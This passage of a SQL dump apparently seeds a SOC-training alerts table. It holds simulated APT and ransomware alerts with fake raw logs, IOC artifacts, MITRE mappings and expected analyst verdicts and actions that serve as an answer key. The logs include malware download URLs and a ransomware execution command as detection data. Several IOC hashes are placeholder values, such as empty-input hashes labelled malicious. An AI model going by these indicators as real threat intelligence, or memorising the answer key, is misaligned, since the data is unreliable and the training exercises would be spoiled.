tool\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"sensitive_schematics_v5.pdf\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal DLP\",\"verdict\":\"internal\",\"details\":\"Classified document\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"jdoe_internal\",\"is_critical\":true,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"suspicious\",\"details\":\"User credentials possibly compromised\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'Advanced', 'NULL', 1, 0, NULL), (496, 'Suspicious Domain Access Detected', 'medium', 'Firewall Logs', 'The attackers initiated their campaign by accessing a compromised domain to deliver the Matryoshka RAT to the ministry\'s network, marking the beginning of their infiltration.', 'Initial Access', 'T1071.001 - Application Layer Protocol: Web Protocols', 1, 'investigating', 34, '{\"timestamp\":\"2023-10-25T14:23:45Z\",\"src_ip\":\"203.0.113.45\",\"dst_ip\":\"10.0.5.23\",\"dst_port\":\"80\",\"protocol\":\"HTTP\",\"domain\":\"compromise-domain.example.com\",\"url\":\"http://compromise-domain.example.com/matryoshka_rat.exe\",\"hash\":\"b1946ac92492d2347c6235b4d2611184\",\"filename\":\"matryoshka_rat.exe\",\"action\":\"allowed\"}', '2026-01-05 04:03:10', '2026-01-11 01:06:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intel Feed\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT activity.\"}},{\"id\":\"artifact_2\",\"type\":\"domain\",\"value\":\"compromise-domain.example.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"OpenDNS\",\"verdict\":\"malicious\",\"details\":\"Domain used for malware distribution.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"b1946ac92492d2347c6235b4d2611184\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches Matryoshka RAT sample.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"matryoshka_rat.exe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"suspicious\",\"details\":\"Filename associated with Matryoshka RAT.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Beginner', 'NULL', 1, 0, NULL), (497, 'Matryoshka RAT Execution', 'high', 'EDR systems', 'Having gained initial access, the attackers execute the Matryoshka RAT on the infected systems, establishing a foothold and enabling further malicious activity. The EDR system detected the execution of a suspicious file associated with the Matryoshka RAT.', 'Execution', 'T1059 - Command and Scripting Interpreter', 1, 'new', NULL, '{\"timestamp\":\"2023-10-01T14:32:00Z\",\"event_id\":\"1001\",\"computer_name\":\"compromised-host.local\",\"user_name\":\"compromised_user\",\"file_path\":\"C:\\\\Users\\\\compromised_user\\\\AppData\\\\Local\\\\Temp\\\\matryoshka.exe\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\",\"process_id\":\"5678\",\"source_ip\":\"192.168.1.101\",\"destination_ip\":\"203.0.113.45\",\"activity\":\"Execution of suspicious file\",\"signature\":\"Matryoshka RAT\"}', '2026-01-05 04:03:13', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP address associated with known APT activity\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File hash matches known signature of Matryoshka RAT\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"matryoshka.exe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal EDR\",\"verdict\":\"suspicious\",\"details\":\"Filename commonly used by Matryoshka RAT\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL), (498, 'DNS Tunneling Activity Identified', 'high', 'DNS logs', 'To ensure sustained access, the attackers employ DNS tunneling, using Matryoshka RAT to communicate with their command and control (C2) server undetected.', 'Persistence', 'T1071.004', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:35:00Z\",\"source_ip\":\"192.168.1.45\",\"destination_ip\":\"103.21.244.15\",\"dns_query\":\"subdomain.example.com\",\"dns_response\":\"NXDOMAIN\",\"protocol\":\"UDP\",\"port\":53,\"query_type\":\"A\",\"malware_hash\":\"58e6c2cd47d9b5f8203d8a7c84d8f8c9\",\"username\":\"jdoe\",\"filename\":\"matryoshka_rat.dll\"}', '2026-01-05 04:03:13', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_network\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"103.21.244.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intelligence\",\"verdict\":\"malicious\",\"details\":\"Known C2 server associated with DNS tunneling\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"58e6c2cd47d9b5f8203d8a7c84d8f8c9\",\"is_critical\":true,\"osint_result\":{\"source\":\"virus_total\",\"verdict\":\"malicious\",\"details\":\"Hash identified with Matryoshka RAT\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"matryoshka_rat.dll\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware_database\",\"verdict\":\"malicious\",\"details\":\"File associated with Matryoshka RAT\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL), (499, 'Unusual Network Traffic Patterns', 'high', 'Network traffic analysis tools', 'Detected DNS tunneling activity used for lateral movement within the network, originating from an internal host attempting to exfiltrate data from various departments in the Ministry.', 'Lateral Movement', 'T1071.004', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:22:08Z\",\"source_ip\":\"10.0.3.25\",\"destination_ip\":\"8.8.8.8\",\"dns_query\":\"sensitive-docs.ministry.local.tunnel.com\",\"method\":\"DNS_TUNNELING\",\"user\":\"jdoe\",\"file_hash\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"detected_by\":\"Network Intrusion Detection System\",\"alert_id\":\"NT-20231015-0004\"}', '2026-01-05 04:03:13', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.3.25\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address used for DNS tunneling.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"8.8.8.8\",\"is_critical\":false,\"osint_result\":{\"source\":\"public\",\"verdict\":\"suspicious\",\"details\":\"Public IP used for external DNS tunneling.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"User initiating the DNS tunneling.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"is_critical\":true,\"osint_result\":{\"source\":\"hash database\",\"verdict\":\"suspicious\",\"details\":\"Hash associated with known DNS tunneling tool.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\",\"escalate\"]}', 'intermediate', 'NULL', 1, 0, NULL), (500, 'Exfiltration Attempt via Encoded DNS Queries', 'high', 'Intrusion detection systems (IDS)', 'In the final stage, the attackers attempt to exfiltrate reconstructed documents through encoded DNS queries, aiming to send these valuable files back to their servers.', 'Exfiltration', 'T1071.004 - Application Layer Protocol: DNS', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:23:45Z\",\"source_ip\":\"192.168.1.45\",\"destination_ip\":\"203.0.113.5\",\"protocol\":\"DNS\",\"query\":\"dGhpcyBpcyBhIHRlc3QucmVzdWx0LmluZm8uZXhhbXBsZS5jb20=\",\"type\":\"TXT\",\"user\":\"jdoe\",\"hostname\":\"workstation-45.local\",\"file_hash\":\"a5d5c8e2f9b3a4d3e8f5c1a0b2d6e7f9\",\"filename\":\"classified_docs.zip\",\"dns_server\":\"8.8.8.8\",\"dns_response\":\"NoError\"}', '2026-01-05 04:03:13', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT database\",\"verdict\":\"malicious\",\"details\":\"Known malicious server used for data exfiltration.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"a5d5c8e2f9b3a4d3e8f5c1a0b2d6e7f9\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with data stealing malware.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"classified_docs.zip\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"suspicious\",\"details\":\"Suspicious file containing sensitive documents.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL), (501, 'Suspicious Connection from Unverified Facebook Profile', 'medium', 'Social Media Monitoring Tools', 'A suspicious connection request from an unverified Facebook profile targeting aerospace employees has been detected. The profile appears to be linked to Rocket Kitten APT, aiming to establish initial contact through social engineering tactics.', 'Social Engineering', 'T1189: Drive-by Compromise', 1, 'new', NULL, '{\"timestamp\":\"2023-10-20T14:23:45Z\",\"platform\":\"Facebook\",\"source_ip\":\"203.0.113.45\",\"target_user\":\"jdoe@aerospacecorp.com\",\"profile_name\":\"Jane Smith\",\"profile_id\":\"fb123456789\",\"profile_url\":\"https://facebook.com/fb123456789\",\"message_content\":\"Hi, I\'m a professional in aerospace technology and would love to connect.\",\"internal_review\":\"Profile created 2 days ago, minimal activity, no verified connections.\",\"connection_status\":\"Pending\",\"internal_ip\":\"192.168.1.105\"}', '2026-01-06 01:24:23', '2026-01-11 01:06:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT Database\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT activities.\"}},{\"id\":\"artifact_2\",\"type\":\"email\",\"value\":\"jdoe@aerospacecorp.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"internal\",\"details\":\"Email belongs to an aerospace employee.\"}},{\"id\":\"artifact_3\",\"type\":\"url\",\"value\":\"https://facebook.com/fb123456789\",\"is_critical\":true,\"osint_result\":{\"source\":\"Social Media Analysis\",\"verdict\":\"suspicious\",\"details\":\"Recently created profile, minimal activity.\"}}],\"recommended_actions\":[\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'Beginner', 'NULL', 1, 0, NULL), (502, 'Malicious Direct Message Sent to Employee', 'high', 'Email Security Gateway', 'An attacker, after gaining the trust of an employee, sent a direct message with a malicious attachment disguised as a legitimate document. The attachment is designed to deliver the \'Gholee\' malware payload.', 'Phishing', 'T1566.001: Spearphishing Attachment', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:23:45Z\",\"email_id\":\"abc123xyz\",\"sender_email\":\"attacker@maliciousdomain.com\",\"recipient_email\":\"employee@company.com\",\"subject\":\"Industry Report Update\",\"attachment\":\"industry_report_update.docx\",\"attachment_hash\":\"e5d8870e5bdd26602cab8f9d5c8a5f87\",\"malware_name\":\"Gholee\",\"src_ip\":\"203.0.113.45\",\"dst_ip\":\"192.168.1.25\",\"url\":\"http://maliciousdomain.com/download\",\"indicator_of_compromise\":[\"attacker@maliciousdomain.com\",\"e5d8870e5bdd26602cab8f9d5c8a5f87\",\"203.0.113.45\",\"http://maliciousdomain.com/download\"]}', '2026-01-06 01:24:23', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"attacker@maliciousdomain.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Associated with phishing campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"e5d8870e5bdd26602cab8f9d5c8a5f87\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Identified as \'Gholee\' malware.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with phishing attacks.\"}},{\"id\":\"artifact_4\",\"type\":\"url\",\"value\":\"http://maliciousdomain.com/download\",\"is_critical\":true,\"osint_result\":{\"source\":\"PhishTank\",\"verdict\":\"malicious\",\"details\":\"Malicious download link.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL), (503, 'Execution of \'Gholee\' Malware Detected', 'high', 'Endpoint Detection and Response (EDR)', 'The execution of \'Gholee\' malware was detected on an endpoint following the opening of a malicious email attachment by an unsuspecting employee. This event signifies a potential compromise of the network with the likelihood of attackers establishing an initial foothold.', 'Malware Execution', 'T1204.002: User Execution: Malicious File', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T08:21:32Z\",\"event_id\":\"EDR-20231015-00123\",\"hostname\":\"workstation-12\",\"user\":\"jdoe\",\"internal_ip\":\"192.168.1.45\",\"external_ip\":\"203.0.113.5\",\"file_name\":\"invoice_2023.pdf.exe\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"process_id\":5678,\"parent_process\":\"explorer.exe\",\"action\":\"execute\",\"signature\":\"Gholee Malware\",\"severity\":\"high\"}', '2026-01-06 01:24:23', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP address associated with known malicious activity.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash of the executed \'Gholee\' malware file.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"invoice_2023.pdf.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Analysis\",\"verdict\":\"malicious\",\"details\":\"Suspicious filename commonly used in phishing attacks.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"internal\",\"details\":\"User account of the employee who executed the malware.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL), (504, 'Establishment of Persistence Mechanisms', 'high', 'Log Analysis', 'The \'Gholee\' malware has been observed implementing various persistence techniques to maintain its foothold on the compromised system. Evidence of suspicious modifications to registry keys and the creation of new scheduled tasks were noted, indicating the attacker\'s attempt to remain undetected.', 'Persistence', 'T1547 - Boot or Logon Autostart Execution', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T03:45:12Z\",\"event_id\":\"4624\",\"source_ip\":\"172.16.254.1\",\"destination_ip\":\"10.0.0.25\",\"username\":\"compromised_user\",\"registry_change\":{\"key_path\":\"HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\",\"value_name\":\"GholeeUpdater\",\"value_data\":\"C:\\\\Users\\\\compromised_user\\\\AppData\\\\Roaming\\\\Gholee\\\\gholee_updater.exe\"},\"scheduled_task\":{\"name\":\"Gholee Persistence Task\",\"task_file\":\"C:\\\\Windows\\\\System32\\\\Tasks\\\\Gholee\\\\task.xml\",\"creator_user\":\"compromised_user\"},\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"external_ip\":\"198.51.100.14\"}', '2026-01-06 01:24:23', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.25\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal_network\",\"verdict\":\"internal\",\"details\":\"Internal IP of compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Known hash associated with \'Gholee\' malware.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"198.51.100.14\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"IP associated with known threat actors.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"gholee_updater.exe\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_analysis\",\"verdict\":\"suspicious\",\"details\":\"Executable file used for malware persistence.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL), (505, 'Lateral Movement Detected Across Network', 'high', 'Network Traffic Analysis', 'With persistence established, Rocket Kitten moves laterally, probing for additional systems to compromise within the aerospace firm\'s network.', 'Lateral Movement', 'T1078: Valid Accounts', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T03:45:30Z\",\"source_ip\":\"192.168.1.100\",\"destination_ip\":\"10.20.30.40\",\"attacker_ip\":\"203.0.113.50\",\"username\":\"jdoe\",\"file_hash\":\"b1946ac92492d2347c6235b4d2611184\",\"filename\":\"RocketKittenTool.exe\",\"event\":\"Lateral Movement Detected\",\"protocol\":\"SMB\",\"description\":\"Suspicious SMB traffic detected from 192.168.1.100 to 10.20.30.40 using compromised credentials.\",\"malware_family\":\"Rocket Kitten\",\"action_taken\":\"Traffic flagged for further analysis\"}', '2026-01-06 01:24:23', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.100\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_network\",\"verdict\":\"internal\",\"details\":\"Internal IP address within the network.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.50\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intel\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with Rocket Kitten APT group.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"b1946ac92492d2347c6235b4d2611184\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware_database\",\"verdict\":\"malicious\",\"details\":\"Hash identified as Rocket Kitten tool.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"RocketKittenTool.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware_repository\",\"verdict\":\"malicious\",\"details\":\"File associated with Rocket Kitten operations.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_database\",\"verdict\":\"suspicious\",\"details\":\"User\'s credentials were used in a suspicious manner.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'intermediate', 'NULL', 1, 0, NULL), (506, 'Data Exfiltration Attempt Identified', 'high', 'Data Loss Prevention (DLP)', 'During the final stage of the operation, Rocket Kitten attempted to exfiltrate sensitive aerospace data to external servers. This activity was detected by the DLP system, indicating a high likelihood of data theft.', 'Exfiltration', 'T1048 - Exfiltration Over Alternative Protocol', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:32:45Z\",\"event_id\":\"DLP-EXFIL-20231015-001\",\"source_ip\":\"192.168.1.105\",\"destination_ip\":\"203.0.113.45\",\"username\":\"jdoe\",\"detected_file\":\"aerospace_project_plan.pdf\",\"file_hash\":\"b1946ac92492d2347c6235b4d2611184\",\"protocol\":\"HTTPS\",\"action_taken\":\"Blocked\",\"alert_severity\":\"High\"}', '2026-01-06 01:24:23', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.105\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Asset Management\",\"verdict\":\"internal\",\"details\":\"Internal IP of compromised host\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known C2 server associated with Rocket Kitten\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"aerospace_project_plan.pdf\",\"is_critical\":true,\"osint_result\":{\"source\":\"DLP System\",\"verdict\":\"suspicious\",\"details\":\"Sensitive document targeted for exfiltration\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"b1946ac92492d2347c6235b4d2611184\",\"is_critical\":true,\"osint_result\":{\"source\":\"File Reputation Service\",\"verdict\":\"clean\",\"details\":\"No known malicious activity associated with this hash\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":true,\"osint_result\":{\"source\":\"HR Database\",\"verdict\":\"internal\",\"details\":\"Employee account used in exfiltration attempt\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL), (507, 'Initial Breach Detected via EternalBlue', 'critical', 'Network Intrusion Detection System (NIDS)', 'An advanced attack was detected leveraging the EternalBlue vulnerability to gain unauthorized access to vulnerable systems within the network. The attacker initiated the breach from a known malicious IP address, targeting internal IP addresses, and executed a payload associated with the exploit.', 'Vulnerability Exploitation', 'T1210 - Exploitation of Remote Services', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T07:45:00Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.15\",\"event_type\":\"exploit_attempt\",\"vulnerability\":\"EternalBlue\",\"payload_hash\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"detected_by\":\"NIDS\",\"filename\":\"exploit.dll\",\"username\":\"unknown\"}', '2026-01-06 01:34:24', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with previous cyber attacks.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal network IP.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with EternalBlue payload.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"exploit.dll\",\"is_critical\":false,\"osint_result\":{\"source\":\"File Analysis\",\"verdict\":\"suspicious\",\"details\":\"Filename commonly used in exploit attempts.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Advanced', 'NULL', 1, 0, NULL), (508, 'Malicious Code Execution Initiated', 'critical', 'Endpoint Detection and Response (EDR)', 'An advanced remote code execution attempt has been detected. The attacker has initiated the WannaCry ransomware payload, beginning the encryption process on compromised systems.', 'Remote Code Execution', 'T1059.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:22:35Z\",\"event_id\":\"edr_456789\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.102\",\"source_port\":443,\"destination_port\":135,\"protocol\":\"TCP\",\"username\":\"compromised_user\",\"executed_command\":\"c:\\\\windows\\\\system32\\\\cmd.exe /c start wannacry.exe\",\"file_hash\":\"3f2efc7f4c0a3b8ff2e8e4d3b6bb6a8f\",\"file_path\":\"C:\\\\Users\\\\compromised_user\\\\Downloads\\\\wannacry.exe\",\"process_id\":12345,\"malware_name\":\"WannaCry\"}', '2026-01-06 01:34:24', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with WannaCry attacks.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.102\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Compromised internal host.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"3f2efc7f4c0a3b8ff2e8e4d3b6bb6a8f\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches WannaCry ransomware sample.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"wannacry.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal EDR\",\"verdict\":\"malicious\",\"details\":\"Known ransomware payload.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"compromised_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"suspicious\",\"details\":\"User credentials possibly compromised.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'Advanced', 'NULL', 1, 0, NULL); INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, 